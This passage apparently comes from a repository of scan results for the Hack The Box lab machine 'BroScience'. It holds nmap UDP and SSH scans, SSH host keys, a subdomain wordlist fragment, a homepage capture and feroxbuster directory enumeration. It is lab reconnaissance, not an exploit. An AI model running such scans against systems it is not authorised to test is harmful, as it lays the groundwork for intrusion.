OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:13 2023 -- 1 IP address (1 host up) scanned in 34.82 seconds

141
HTB/broscience/results/scans/_top_100_udp_nmap.txt Normal file
View File

@@ -0,0 +1,141 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml 10.10.11.195
Warning: 10.10.11.195 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.10.11.195 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.11.195 from 200 to 400 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.11.195 from 400 to 800 due to 11 out of 14 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of -161451 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -161451 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -186670 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -186670 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -989326 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -989326 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1019435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1019435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -578820 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -578820 microseconds. Ignoring time.
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.087s latency).
Scanned at 2023-02-01 17:49:39 CET for 293s
PORT STATE SERVICE REASON VERSION
7/udp open|filtered echo no-response
9/udp closed discard port-unreach ttl 63
17/udp closed qotd port-unreach ttl 63
19/udp open|filtered chargen no-response
49/udp open|filtered tacacs no-response
53/udp open|filtered domain no-response
67/udp open|filtered dhcps no-response
68/udp open|filtered dhcpc no-response
69/udp closed tftp port-unreach ttl 63
80/udp closed http port-unreach ttl 63
88/udp closed kerberos-sec port-unreach ttl 63
111/udp closed rpcbind port-unreach ttl 63
120/udp open|filtered cfdptkt no-response
123/udp closed ntp port-unreach ttl 63
135/udp open|filtered msrpc no-response
136/udp closed profile port-unreach ttl 63
137/udp closed netbios-ns port-unreach ttl 63
138/udp closed netbios-dgm port-unreach ttl 63
139/udp open|filtered netbios-ssn no-response
158/udp open|filtered pcmail-srv no-response
161/udp closed snmp port-unreach ttl 63
162/udp closed snmptrap port-unreach ttl 63
177/udp closed xdmcp port-unreach ttl 63
427/udp closed svrloc port-unreach ttl 63
443/udp closed https port-unreach ttl 63
445/udp open|filtered microsoft-ds no-response
497/udp open|filtered retrospect no-response
500/udp closed isakmp port-unreach ttl 63
514/udp closed syslog port-unreach ttl 63
515/udp closed printer port-unreach ttl 63
518/udp closed ntalk port-unreach ttl 63
520/udp closed route port-unreach ttl 63
593/udp closed http-rpc-epmap port-unreach ttl 63
623/udp closed asf-rmcp port-unreach ttl 63
626/udp closed serialnumberd port-unreach ttl 63
631/udp closed ipp port-unreach ttl 63
996/udp open|filtered vsinet no-response
997/udp closed maitrd port-unreach ttl 63
998/udp open|filtered puparp no-response
999/udp open|filtered applix no-response
1022/udp closed exp2 port-unreach ttl 63
1023/udp closed unknown port-unreach ttl 63
1025/udp open|filtered blackjack no-response
1026/udp closed win-rpc port-unreach ttl 63
1027/udp open|filtered unknown no-response
1028/udp closed ms-lsa port-unreach ttl 63
1029/udp closed solid-mux port-unreach ttl 63
1030/udp open|filtered iad1 no-response
1433/udp open|filtered ms-sql-s no-response
1434/udp closed ms-sql-m port-unreach ttl 63
1645/udp closed radius port-unreach ttl 63
1646/udp closed radacct port-unreach ttl 63
1701/udp closed L2TP port-unreach ttl 63
1718/udp closed h225gatedisc port-unreach ttl 63
1719/udp closed h323gatestat port-unreach ttl 63
1812/udp closed radius port-unreach ttl 63
1813/udp open|filtered radacct no-response
1900/udp open|filtered upnp no-response
2000/udp closed cisco-sccp port-unreach ttl 63
2048/udp closed dls-monitor port-unreach ttl 63
2049/udp closed nfs port-unreach ttl 63
2222/udp open|filtered msantipiracy no-response
2223/udp closed rockwell-csp2 port-unreach ttl 63
3283/udp closed netassistant port-unreach ttl 63
3456/udp closed IISrpc-or-vat port-unreach ttl 63
3703/udp closed adobeserver-3 port-unreach ttl 63
4444/udp closed krb524 port-unreach ttl 63
4500/udp open|filtered nat-t-ike no-response
5000/udp open|filtered upnp no-response
5060/udp closed sip port-unreach ttl 63
5353/udp open|filtered zeroconf no-response
5632/udp open|filtered pcanywherestat no-response
9200/udp closed wap-wsp port-unreach ttl 63
10000/udp closed ndmp port-unreach ttl 63
17185/udp open|filtered wdbrpc no-response
20031/udp closed bakbonenetvault port-unreach ttl 63
30718/udp closed unknown port-unreach ttl 63
31337/udp open|filtered BackOrifice no-response
32768/udp closed omad port-unreach ttl 63
32769/udp closed filenet-rpc port-unreach ttl 63
32771/udp open|filtered sometimes-rpc6 no-response
32815/udp closed unknown port-unreach ttl 63
33281/udp closed unknown port-unreach ttl 63
49152/udp open|filtered unknown no-response
49153/udp closed unknown port-unreach ttl 63
49154/udp closed unknown port-unreach ttl 63
49156/udp open|filtered unknown no-response
49181/udp closed unknown port-unreach ttl 63
49182/udp closed unknown port-unreach ttl 63
49185/udp closed unknown port-unreach ttl 63
49186/udp open|filtered unknown no-response
49188/udp closed unknown port-unreach ttl 63
49190/udp closed unknown port-unreach ttl 63
49191/udp closed unknown port-unreach ttl 63
49192/udp open|filtered unknown no-response
49193/udp closed unknown port-unreach ttl 63
49194/udp closed unknown port-unreach ttl 63
49200/udp open|filtered unknown no-response
49201/udp closed unknown port-unreach ttl 63
65024/udp closed unknown port-unreach ttl 63
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/1%OT=%CT=%CU=9%PV=Y%DS=2%DC=T%G=N%TM=63DA9948%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
SEQ(CI=Z)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 162/udp)
HOP RTT ADDRESS
1 31.00 ms 10.10.16.1
2 328.64 ms broscience.htb (10.10.11.195)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:54:32 2023 -- 1 IP address (1 host up) scanned in 293.59 seconds

62
HTB/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt Normal file
View File

@@ -0,0 +1,62 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.026s latency).
Scanned at 2023-02-01 17:50:14 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=
| 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=
| 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN
| ssh2-enum-algos:
| kex_algorithms: (9)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (5)
| rsa-sha2-512
| rsa-sha2-256
| ssh-rsa
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
|_banner: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:16 2023 -- 1 IP address (1 host up) scanned in 2.28 seconds

100
HTB/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml Normal file
View File

@@ -0,0 +1,100 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.195" start="1675270214" startstr="Wed Feb 1 17:50:14 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="SYN Stealth Scan" time="1675270214"/>
<taskend task="SYN Stealth Scan" time="1675270214" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675270214"/>
<taskend task="Service scan" time="1675270214" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270216"/>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270216"/>
<host starttime="1675270214" endtime="1675270216"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=&#xa; 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=&#xa; 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN"><table>
<elem key="type">ssh-rsa</elem>
<elem key="bits">3072</elem>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=</elem>
<elem key="fingerprint">df17c6bab18222d91db5ebff5d3d2cb7</elem>
</table>
<table>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="bits">256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=</elem>
<elem key="fingerprint">3f8a56f8958faeafe3ae7eb880f679d2</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="bits">256</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN</elem>
<elem key="fingerprint">3c6575274ae2ef9391374cfdd9d46341</elem>
</table>
</script><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (9)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (5)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ssh-rsa&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ssh-rsa</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="banner" output="SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1"/></port>
</ports>
<times srtt="26279" rttvar="26279" to="131395"/>
</host>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270216"/>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270216"/>
<runstats><finished time="1675270216" timestr="Wed Feb 1 17:50:16 2023" summary="Nmap done at Wed Feb 1 17:50:16 2023; 1 IP address (1 host up) scanned in 2.28 seconds" elapsed="2.28" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

124
HTB/broscience/results/scans/tcp443/tcp_443_https_broscience.htb_vhosts_subdomains-top1million-110000.txt Normal file
View File

@@ -0,0 +1,124 @@
web18759
web3621
web18808
web18275
web18276
web18274
web3624
web3626
web18273
web3625
web3623
web18277
forum5
web18809
skunk
ckp
cybozu
fs7
kaori
hendry
fs8
violin
tomorrow
tonton
ate
kaizoku
physik
asean
germanium
sourabh
chiko
rc2
clown
telechargement
mhm
arch1
londres
ticket2
starsoft
ssltest2
s1018
irish
dip
www.pdf
www.idc
blacknight
aileen
advisortrac
vcr
sips
autodiscover.ns1
prashanth
autoconfig.ns1
danco
www.cyberspace
orgs
iprint
manualidades
n6
freaks
brook
hoop
pancake
corsair
kissmin
ns155
www.gamma
lifetime
omega2
farida
mojtaba
viki
messiah
www.firma
lifes
delight
sweetdona
kangdy777
dlfmaekdns
retireplan
wichitapre
catspre
altmusicpre
usmilitary
soapspre
dying
hartfordpre
emailpre
gojapanpre
christianitypre
paganwiccanpre
islampre
homevideopre
tattoopre
macsupport
southbayadmin
www.reklam
ip243
o1.send
ip241
skylark
sszang00
kudos
juese11
leebrkorea1
diybatr2427
sbgs221
avgood
ljhon00
realnut
hca-rc-013.shca
csg-saf-0029.csg
mvm-ri-d127123.roslin
hca-spglab-048.shca
www.memory
www.jjm
www.micronet
mvm-ri-d086122.roslin
www.las
ccem
b68
aszx
atto
sp2digital

158
HTB/broscience/results/scans/tcp443/tcp_443_https_curl.html Normal file
View File

@@ -0,0 +1,158 @@
HTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=514ejha3mn98hdt774ba24b3ku; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>BroScience : Home</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/uikit@3.15.0/dist/css/uikit.min.css" />
<script src="https://cdn.jsdelivr.net/npm/uikit@3.15.0/dist/js/uikit.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/uikit@3.15.0/dist/js/uikit-icons.min.js"></script> <link rel="stylesheet" href="styles/light.css">
</head>
<body class="uk-dark">
<nav class="uk-navbar-container uk-margin uk-navbar-transparent uk-dark">
<div class="uk-container uk-container-expand">
<div class="uk-navbar" uk-navbar>
<div class="uk-navbar-left">
<a href="/" class="uk-navbar-item uk-logo">BroScience</a>
</div>
<div class="uk-navbar-right">
<ul class="uk-navbar-nav"><li><a href="login.php">Log In</a></li></ul> </div>
</div>
</div>
</nav> <div class="uk-container uk-margin">
<!-- TODO: Search bar -->
<div class="uk-child-width-1-2@s uk-child-width-1-3@m" uk-grid> <div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=bench.png" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=1" class="uk-card-title">Bench Press</a>
<p>The bench press is widely regarded as the king of all exercises, specifically in building the chest ... <a href="exercise.php?id=1">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=1">administrator</a> 9 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=barbell_squats.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=2" class="uk-card-title">Barbell Squats</a>
<p>The barbell back squat is a very popular compound movement which emphasizes building the leg muscle ... <a href="exercise.php?id=2">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=2">bill</a> 1 year ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=seated_rows.png" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=3" class="uk-card-title">Seated Rows</a>
<p>If you want to target your lats, seated rows are a great exercise to do so. There are machines where... <a href="exercise.php?id=3">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=2">bill</a> 8 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=deadlift.png" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=4" class="uk-card-title">Deadlift</a>
<p>Deadlifts are another great exercise for targeting a lot of muscle groups at the same time, with the... <a href="exercise.php?id=4">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=1">administrator</a> 7 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=tricep_extensions.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=5" class="uk-card-title">Tricep Extensions</a>
<p>Tricep extensions are a great exercise to target your triceps. Requiring only a dumbell, you can do ... <a href="exercise.php?id=5">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=3">michael</a> 7 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=dumbell_curls.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=6" class="uk-card-title">Dumbell Curls</a>
<p>Curls for the girls. Arguably the favorite exercise of many gym-goers, this is a very good exercise ... <a href="exercise.php?id=6">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=4">john</a> 2 years ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=reverse_butterfly.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=7" class="uk-card-title">Reverse Butterfly</a>
<p>Reverse butterfly may be done with free weights or with a machine, although I personally prefer the ... <a href="exercise.php?id=7">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=1">administrator</a> 11 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=shoulder_press.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=8" class="uk-card-title">Shoulder Press</a>
<p>Shoulder press, also known as the military press or overhead press, is a great way to build your sho... <a href="exercise.php?id=8">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=3">michael</a> 10 months ago</p>
</div>
</div>
</div>
</div> </div>
</body>
</html>

82
HTB/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt Normal file
View File

@@ -0,0 +1,82 @@
200 GET 29l 70w 1309c https://10.10.11.195/user.php
200 GET 1l 4w 39c https://10.10.11.195/includes/img.php
200 GET 3l 7w 44c https://10.10.11.195/styles/light.css
200 GET 42l 97w 1936c https://10.10.11.195/login.php
200 GET 28l 71w 1322c https://10.10.11.195/exercise.php
200 GET 147l 510w 0c https://10.10.11.195/
403 GET 9l 28w 278c https://10.10.11.195/.html
403 GET 9l 28w 278c https://10.10.11.195/.php
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd
403 GET 9l 28w 278c https://10.10.11.195/.htaccess
403 GET 9l 28w 278c https://10.10.11.195/.hta
403 GET 9l 28w 278c https://10.10.11.195/.hta.txt
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.txt
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.txt
403 GET 9l 28w 278c https://10.10.11.195/.hta.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.html
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.php
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.asp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.aspx
403 GET 9l 28w 278c https://10.10.11.195/.hta.aspx
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.aspx
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.jsp
403 GET 9l 28w 278c https://10.10.11.195/.hta.jsp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.jsp
200 GET 28l 66w 1256c https://10.10.11.195/activate.php
302 GET 1l 3w 13c https://10.10.11.195/comment.php => https://10.10.11.195/login.php
301 GET 9l 28w 315c https://10.10.11.195/images => https://10.10.11.195/images/
